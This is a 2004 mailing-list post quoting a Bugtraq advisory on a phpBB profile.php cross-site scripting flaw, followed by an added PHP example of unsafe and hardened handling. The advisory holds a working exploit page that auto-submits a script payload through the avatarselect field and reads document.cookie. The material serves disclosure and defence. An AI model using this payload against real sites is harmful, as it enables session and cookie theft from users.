I'm going to say this again. Please contact security@ before posting here, and give them an appropriate amount of time to reply. This goes for _any_ software company. Thank you.

----- Original Message -----
From: "Cheng Peng Su" <apple_soup@msn.com>
To: <bugtraq@securityfocus.com>
Sent: Saturday, March 20, 2004 10:36 PM
Subject: phpBB profile.php Cross Site Scripting Vulnerability

|
| #####################################################################
|
| Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
| Release Date : Mar 21,2004
| Application : phpBB
| Version : phpBB 2.0.6d or others?
| Platform : PHP
| Vendor URL : http://www.phpbb.com/
| Author : Cheng Peng Su(apple_soup_at_msn.com)
|
| #####################################################################
|
| Proof of Concept:
|
| This vuln is in profile.php: when you click [Show Gallery], phpBB
| will show you the Avatar gallery, asking you to choose one for yourself.
| The hole is in the form: after submitting, phpBB will use the value of
| "avatarselect" as the path of the gallery directly, without filtering
| any illegal characters.
|
| Exploit:
|
| -------------exploit.htm--------------
| <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
| <input name="avatarselect" value='" ><script>alert(document.cookie)</script>'>
| <input type="submit" name="submitavatar" value="Select avatar">
| </form>
| <script>
| window.onload=function()
| {
| document.all.submitavatar.click();
| }
| </script>
| ---------------end-------------------
|
| Contact:
|
| Cheng Peng Su
| Class 1, Senior 2, High School Attached to Wuhan University
| Wuhan, Hubei, China (430072)
| apple_soup_at_msn.com
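For readers looking at the class of bug the quoted advisory describes rather than at phpBB specifically, the following is an added PHP illustration, not phpBB's own code and not part of the original post. It puts the unsafe pattern (a submitted "avatarselect" value reflected straight back into the form) next to a hardened handler that accepts only entries actually present in the gallery and HTML-escapes whatever it echoes. The function names, the $gallery_root path and the $known_avatars list are assumptions constructed for this example; a real application would enumerate the list from the gallery directory on disk.

```php
<?php
// Added illustration (not phpBB's code): the unsafe pattern the advisory
// describes, beside a hardened version. avatar_select_unsafe(),
// avatar_select_safe(), $gallery_root and $known_avatars are assumed names.

// Constructed stand-in for the gallery directory and its contents.
$gallery_root  = '/var/www/phpbb/images/avatars/gallery';
$known_avatars = ['cats/tabby.gif', 'cats/siamese.gif', 'dogs/beagle.gif'];

// Unsafe: the submitted value is written into an attribute without escaping,
// so a value containing a quote and a tag closes the attribute and injects
// markup. This is the shape of the flaw reported above.
function avatar_select_unsafe(string $avatarselect): string
{
    return '<input type="hidden" name="avatarselect" value="' . $avatarselect . '">';
}

// Hardened: reject anything that is not one of the gallery's own entries and
// escape the value before it is echoed, so attribute and tag characters cannot
// break out of the HTML context.
function avatar_select_safe(string $avatarselect, array $known_avatars): ?string
{
    // Normalise separators and refuse empty, absolute or traversing paths
    // before comparing; the value is also used as a path, so both concerns
    // (XSS on reflection, traversal on use) are handled here.
    $candidate = str_replace('\\', '/', $avatarselect);
    if ($candidate === '' || $candidate[0] === '/' || strpos($candidate, '..') !== false) {
        return null;
    }
    // Allowlist: only entries enumerated from the gallery directory are accepted.
    if (!in_array($candidate, $known_avatars, true)) {
        return null;
    }
    // Escape for an HTML attribute context (ENT_QUOTES covers both quote styles).
    $escaped = htmlspecialchars($candidate, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="avatarselect" value="' . $escaped . '">';
}

// Demonstration with a constructed value shaped like the advisory's payload.
$payload = '" ><script>alert(1)</script>';
echo "unsafe: ", avatar_select_unsafe($payload), PHP_EOL;
var_dump(avatar_select_safe($payload, $known_avatars));
echo "safe:   ", avatar_select_safe('cats/tabby.gif', $known_avatars), PHP_EOL;
```

The allowlist check is the important part: escaping alone stops the reflected script, but because the same value is then used to build a filesystem path, restricting it to names the application itself produced closes both the XSS and any path-manipulation reading of "without filtering any illegal characters".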